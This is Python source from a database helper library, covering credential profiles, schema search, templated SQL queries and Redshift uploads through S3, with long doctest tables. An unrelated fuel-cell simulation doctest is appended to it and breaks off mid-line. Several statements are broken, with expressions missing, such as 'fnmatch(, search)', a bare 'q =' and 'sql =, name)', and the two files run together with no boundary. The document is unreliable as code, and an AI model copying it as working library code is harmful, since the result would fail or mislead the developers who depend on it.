tables(self): """A lazy loaded reference to the table metadata for the DB.""" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return "DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile="default"): """ Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not to say this a secure way to store sensitive data, but it will probably stop your little sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. "dw", "prod") """ f = profile_path(DBPY_PROFILE_ID, profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception("Credentials not configured!") def save_credentials(self, profile="default"): """ Save your database credentials so you don't have to save them in script. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. "dw", "prod") from db import DB import pymysql db = DB(username="hank", password="<PASSWORD>", hostname="", dbname="bar", dbtype="mysql") db.save_credentials(profile="production") db = DB(username="hank", password="<PASSWORD>", hostname="", dbname="bar", dbtype="mysql") db.save_credentials(profile="staging") db = DB(profile="staging") >>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') """ f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile="default"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof = load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile="default"): """Save the database credentials, plus the database properties to your profile.""" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): """Dict representation of all credentials for the database.""" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None return { "username": self.username, "password": self.password, "hostname": self.hostname, "port": self.port, "filename": db_filename, "dbname": self.dbname, "dbtype": self.dbtype, "schemas": self.schemas, "limit": self.limit, "keys_per_column": self.keys_per_column, } def find_table(self, search): """ Aggresively search through your database's schema for a table. Parameters ----------- search: str glob pattern for what you're looking for Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> db.find_table("A*") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table("tmp*") # returns all tables prefixed w/ tmp >>> results = db.find_table("prod_*") # returns all tables prefixed w/ prod_ >>> results = db.find_table("*Invoice*") # returns all tables containing trans >>> results = db.find_table("*") # returns everything """ tables = [] for table in self.tables: if glob.fnmatch.fnmatch(, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): """ Aggresively search through your database's schema for a column. Parameters ----------- search: str glob pattern for what you're looking for data_type: str, list (optional) specify which data type(s) you want to return Examples ---------- >>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column("Name").columns) 5 >>> len(db.find_column("*Id").columns) 20 >>> len(db.find_column("*Address*").columns) 3 >>> len(db.find_column("*Address*", data_type="NVARCHAR(70)").columns) 3 >>> len(db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]).columns) 17 -= Should sort in some way for all those doctests to be viable... -= if not, there's always a random issue where rows are not in the same order, making doctest fail. db.find_column("Name") # returns all columns named "Name" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | | Genre | Name | NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column("*Id") # returns all columns ending w/ Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album | ArtistId | INTEGER | | Artist | ArtistId | INTEGER | | Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | | Employee | EmployeeId | INTEGER | | Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId | INTEGER | | Track | AlbumId | INTEGER | | Track | MediaTypeId | INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column("*Address*") # returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column("*Address*", data_type="NVARCHAR(70)") # returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Employee | Address | NVARCHAR(70) | | Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]) # returns all columns have an "e" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER | | Customer | CustomerId | INTEGER | | Employee | ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER | | Track | GenreId | INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ """ if isinstance(data_type, str): data_type = [data_type] cols = [] for table in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in ["postgres", "redshift", "sqlite", "mysql"]: if limit: q = q.rstrip().rstrip(";") q = "select * from ({q}) q limit {limit}".format(q=q, limit=limit) return q # mssql else: if limit: q = "select top {limit} * from ({q}) q".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data] query = [str(item) for item in query] if union==True: query = "\nUNION ALL".join(query) else: query = "\n".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else: return q return query def query(self, q, data=None, union=True, limit=None): """ Query your database with a raw string. Parameters ---------- q: str Query string to execute data: list, dict Optional argument for handlebars-queries. Data will be passed to the template and rendered using handlebars. union: bool Whether or not "UNION ALL" handlebars templates. This will return any handlebars queries as a single data frame. limit: int Number of records to return Examples -------- >>> from db import DemoDB >>> db = DemoDB() db.query("select * from Track").head(2) TrackId Name AlbumId MediaTypeId \\\r 0 1 For Those About To Rock (We Salute You) 1 1 1 2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query("select * from Track", limit=10) TrackId Name AlbumId MediaTypeId \ 0 1 For Those About To Rock (We Salute You) 1 1 1 2 Balls to the Wall 2 2 2 3 Fast As a Shark 3 2 3 4 Restless and Wild 3 2 4 5 Princess of the Dawn 3 2 5 6 Put The Finger On You 1 1 6 7 Let's Get It Up 1 1 7 8 Inject The Venom 1 1 8 9 Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \ 0 1 <NAME>, <NAME>, <NAME> 343719 1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99 6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \ 0 For Those About To Rock We Salute You 1 Balls to the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and Wild 5 For Those About To Rock We Salute You 6 For Those About To Rock We Salute You 7 For Those About To Rock We Salute You 8 For Those About To Rock We Salute You 9 For Those About To Rock We Salute You Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM ... {{ name }} ... GROUP BY ... table_name ... ''' >>> data = [ ... {"name": "Album"}, ... {"name": "Artist"}, ... {"name": "Track"} ... ] >>> db.query(q, data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track 3503 >>> q = ''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data = {"cols": ["AlbumId", "Title", "ArtistId"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To Rock We Salute You 1 1 2 Balls to the Wall 2 2 3 Restless and Wild 2 3 4 Let There Be Rock 1 4 5 Big Ones 3 """ if data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True, limit=None): """ Query your database from a file. Parameters ---------- filename: str A SQL script data: list, dict Optional argument for handlebars-queries. Data will be passed to the template and rendered using handlebars. union: bool Whether or not "UNION ALL" handlebars templates. This will return any handlebars queries as a single data frame. limit: int Number of records to return Examples -------- >>> from db import DemoDB >>> db = DemoDB() >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ... Album a ... INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> with open("db/tests/myscript.sql", "w") as f: ... f.write(q) 109 >>> len(db.query_from_file("db/tests/myscript.sql", limit=10)) 10 db.query_from_file("db/tests/myscript.sql", limit=10) Title \ 0 For Those About To Rock We Salute You 1 Balls to the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless and Wild 5 For Those About To Rock We Salute You 6 For Those About To Rock We Salute You 7 For Those About To Rock We Salute You 8 For Those About To Rock We Salute You 9 For Those About To Rock We Salute You Name UnitPrice 0 For Those About To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4 Princess of the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 """ with open(filename) as fp: q = return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): """ SQLite doesn't come with any metatables (at least ones that fit into our framework), so we're going to create them. """ sys.stderr.write("Indexing schema. This will take a second...") rows_to_insert = [] tables = [row[0] for row in self.cur.execute("select name from sqlite_master where type='table';")] for table in tables: for row in self.cur.execute("pragma table_info('{0}')".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute("drop table if exists tmp_dbpy_schema;") self.cur.execute("create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);") for row in rows_to_insert: self.cur.execute("insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');".format(*row)) self.cur.execute("SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';") # find for foreign keys self.cur.execute("drop table if exists tmp_dbpy_foreign_keys;") self.cur.execute("create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);") foreign_keys = [] self.cur.execute("SELECT name, sql FROM sqlite_master ;") for (table_name, sql) in self.cur: rgx = "FOREIGN KEY \(\[(.*)\]\) REFERENCES \[(.*)\] \(\[(.*)\]\)" if sql is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = "insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write("finished!\n") def refresh_schema(self, exclude_system_tables=True, use_cache=False): """ Pulls your database's schema again and looks for any new tables and columns. """ col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly from cache # 2. use a single query for getting all key relationships # 3. use the naive approach if use_cache: # generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column) for t in sorted(tables.keys())]) sys.stderr.write("done!\n") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull out column metadata for all tables as list of tuples if told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write("Loading cached metadata. Please wait...") for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} # col metadata: format as list of tuples, to match how normal loading is performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write("Refreshing schema. Please wait...") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system'] self.cur.execute(q) col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns, and attach to each table to the table name in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema, table_name, column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print ("Error executing command:") print ("\t '{0}'".format(cmd)) print ("Exception: {0}".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): """ Upload a dataframe to redshift via s3. Parameters ---------- name: str name for your shiny new table df: DataFrame data frame you want to save to the db drop_if_exists: bool (False) whether you'd like to drop the table if it already exists chunk_size: int (10000) Number of DataFrame chunks to upload and COPY from S3. Upload speed is *much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node, so if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this is None, the function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key. if this is None, the function will try and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys, you can use an S3 object print_sql: bool (False) option for printing sql statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which to create the temporary transfer s3 bucket. This should match your redshift cluster's region. Examples -------- """ if self.dbtype!="redshift": raise Exception("Sorry, feature only available for redshift.") try: from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if boto is present, set the bucket_location to default. # we can't do this in the function definition because we're # lazily importing boto only if necessary here. if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception("Couldn't find boto library. Please ensure it is installed") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception("Must specify AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`") if AWS_SECRET_KEY is None: raise Exception("Must specify AWS_SECRET_KEY as either function argument or as an environment variable `AWS_SECRET_KEY`") conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) #this way users with permission on specific buckets can use this feature bucket_name = "dbpy-{0}".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file into pieces. according to amazon, this is # much faster when it comes time to run the \COPY statment. # # see sys.stderr.write("Transfering {0} to s3 in chunks".format(name)) len_df = len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size) k.set_metadata('parent', '') out = StringIO() with gzip.GzipFile(fileobj=out, mode="w") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(".") return i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write("done\n") if drop_if_exists: sql = "DROP TABLE IF EXISTS {0};".format(name) if print_sql: sys.stderr.write(sql + "\n") self._try_command(sql) # generate schema from pandas and then adapt for redshift sql =, name) # defaults to using SQLite format. need to convert it to Postgres sql = sql.replace("[", "").replace("]", "") # we'll create the table ONLY if it doens't exist sql = sql.replace("CREATE TABLE", "CREATE TABLE IF NOT EXISTS") if print_sql: sys.stderr.write(sql + "\n") self._try_command(sql) self.con.commit() # perform the \COPY here. the s3 argument is a prefix, so it'll pick up # all of the data*.gz files we've created sys.stderr.write("Copying data from s3 to redshfit...") sql = """ copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; """.format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + "\n") self._try_command(sql) self.con.commit() sys.stderr.write("done!\n") # tear down the bucket sys.stderr.write("Tearing down bucket...") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write("done!") def to_dict(self): """Dict representation of the database as credentials plus tables dict representation.""" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): """ Lists all of the database profiles available Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite', u'filename': u'/Users/glamp/repos/yhat/opensource/', u'hostname': u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} """ profiles = {} user = os.path.expanduser("~") for f in os.listdir(user): if f.startswith(".db.py_"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): """ Removes a profile from your config """ user = os.path.expanduser("~") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f = os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception("Profile '{0}' does not exist. Could not find file {1}".format(name, f)) os.remove(f) except Exception as e: raise Exception("Could not remove profile {0}! Excpetion: {1}".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): """ Provides an instance of DB that hooks up to the Chinook DB See for more info. """ _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column, **kwargs)
# -*- coding: utf-8 -*- ''' >>> from opem.Dynamic.Padulles_Amphlett import * >>> import shutil >>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":343,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":0.1,"i-stop":4,"i-step":0.1,"Name":"Test"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . . I : 0.1 E : 6.0684154992732005 V Eta Activation : 0.18557231242539243 V Eta Concentration : 1.948431634418616e-05 V Eta Ohmic : 0.00017548304819292376 V FC Efficiency : 0.6589203974773784 FC Power : 0.5139579100323552 W FC Voltage : 5.1395791003235525 V Loss : 0.18576727978992955 V PH2 : 0.19717074233280188 atm PH2O : 0.2426831613626925 atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration : 3.899435456560147e-05 V Eta Ohmic : 0.0003510800160998837 V FC Efficiency : 0.6293798842665886 FC Power : 0.9818326194558784 W FC Voltage : 4.909163097279392 V Loss : 0.23185017288443285 V PH2 : 0.1971566919511875 atm PH2O : 0.24266586776736396 atm PO2 : 0.1906184358000996 atm Power-Thermal : 0.24816738054412169 W ########### I : 0.3 E : 6.068412424065923 V Eta Activation : 0.2583036192079603 V Eta Concentration : 5.853018266659147e-05 V Eta Ohmic : 0.0005267910327125488 V FC Efficiency : 0.6120471438396443 FC Power : 1.4321903165847678 W FC Voltage : 4.7739677219492265 V Loss : 0.25888894042333943 V PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal : 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta Activation : 0.27735002084480426 V Eta Concentration : 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss : 0.27813072895256186 V PH2 : 0.19712859118795872 atm PH2O : 0.24263128057670688 atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5 E : 6.068409348602667 V Eta Activation : 0.2921240370409447 V Eta Concentration : 9.76794818682758e-05 V Eta Ohmic : 0.0008785557847524419 V FC Efficiency : 0.5901164085980564 FC Power : 2.30145399353242 W FC Voltage : 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O : 0.24261398698137834 atm PO2 : 0.1905946372855047 atm Power-Thermal : 0.7735460064675803 W ########### I : 0.6 E : 6.0684078107750326 V Eta Activation : 0.3041956781419353 V Eta Concentration : 0.00011729309032954864 V Eta Ohmic : 0.0010546098289093816 V FC Efficiency : 0.5822525519832258 FC Power : 2.724941943281497 W FC Voltage : 4.541569905469162 V Loss : 0.30536758106117423 V PH2 : 0.19710049042472996 atm PH2O : 0.2425966933860498 atm PO2 : 0.1905867044473064 atm Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta Activation : 0.31440243547871893 V Eta Concentration : 0.00013693276339445145 V Eta Ohmic : 0.0012307785370829418 V FC Efficiency : 0.5755840434599239 FC Power : 3.1426888772911847 W FC Voltage : 4.489555538987407 V Loss : 0.3157701467791963 V PH2 : 0.19708644004311557 atm PH2O : 0.24257939979072127 atm PO2 : 0.19057877160910808 atm Power-Thermal : 1.1623111227088154 W ########### I : 0.8 E : 6.068404734927729 V Eta Activation : 0.3232442167420945 V Eta Concentration : 0.00015659857042988755 V Eta Ohmic : 0.0014070620817435461 V FC Efficiency : 0.569790429225178 FC Power : 3.555492278365111 W FC Voltage : 4.4443653479563885 V Loss : 0.324807877394268 V PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal : 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta Activation : 0.3310434726426763 V Eta Concentration : 0.0001762905810800498 V Eta Ohmic : 0.0015834606415773538 V FC Efficiency : 0.5646650099463304 FC Power : 3.96394836982324 W FC Voltage : 4.404387077581378 V Loss : 0.3328032238653337 V PH2 : 0.19705833927988675 atm PH2O : 0.24254481260006414 atm PO2 : 0.19056290593271147 atm Power-Thermal : 1.5710516301767605 W ########### I : 1.0 E : 6.068401658824337 V Eta Activation : 0.33802037026202836 V Eta Concentration : 0.0001960088652678871 V Eta Ohmic : 0.0017599744011013664 V FC Efficiency : 0.5600666527156857 FC Power : 4.368519891182348 W FC Voltage : 4.368519891182348 V Loss : 0.3399763535283976 V PH2 : 0.19704428889827239 atm PH2O : 0.2425275190047356 atm PO2 : 0.1905549730945132 atm Power-Thermal : 1.781480108817652 W ########### I : 1.1 E : 6.068400120676597 V Eta Activation : 0.3443319458183834 V Eta Concentration : 0.00021575349319660598 V Eta Ohmic : 0.0019366035503462617 V FC Efficiency : 0.55589469312397 FC Power : 4.769576467003663 W FC Voltage : 4.335978606366966 V Loss : 0.3464843028619262 V PH2 : 0.197030238516658 atm PH2O : 0.24251022540940706 atm PO2 : 0.19054704025631486 atm Power-Thermal : 1.9954235329963377 W ########### I : 1.2 E : 6.068398582464819 V Eta Activation : 0.35009414904739194 V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2 : 0.1970161881350436 atm PH2O : 0.24249293181407852 atm PO2 : 0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta Activation : 0.35539503345654255 V Eta Concentration : 0.0002553220624997795 V Eta Ohmic : 0.0022902088041253615 V FC Efficiency : 0.5485505413555333 FC Power : 5.562302489345107 W FC Voltage : 4.27869422257316 V Loss : 0.3579405643231677 V PH2 : 0.19700213775342923 atm PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ########### I : 1.4 E : 6.06839550584913 V Eta Activation : 0.36030304442922906 V Eta Concentration : 0.00027514614569545357 V Eta Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266 V PH2 : 0.19698808737181484 atm PH2O : 0.24245834462342142 atm PO2 : 0.19052324174171997 atm Power-Thermal : 2.6555639230341663 W ########### I : 1.5 E : 6.068393967445208 V Eta Activation : 0.3648724409731032 V Eta Concentration : 0.0002949968562774962 V Eta Ohmic : 0.002644278024175193 V FC Efficiency : 0.5422224856637728 FC Power : 6.344003082266143 W FC Voltage : 4.229335388177429 V Loss : 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 : 0.19051530890352164 atm Power-Thermal : 2.8809969177338575 W ########### I : 1.6 E : 6.068392428977227 V Eta Activation : 0.36914696409844006 V Eta Concentration : 0.0003148742658730733 V Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2 : 0.19695998660858605 atm PH2O : 0.24242375743276434 atm PO2 : 0.19050737606532336 atm Power-Thermal : 3.1088387177404826 W ########### I : 1.7 E : 6.068390890445182 V Eta Activation : 0.3731623911228729 V Eta Concentration : 0.0003347784463987542 V Eta Ohmic : 0.0029988129062160497 V FC Efficiency : 0.5366552535984287 FC Power : 7.116048662715165 W FC Voltage : 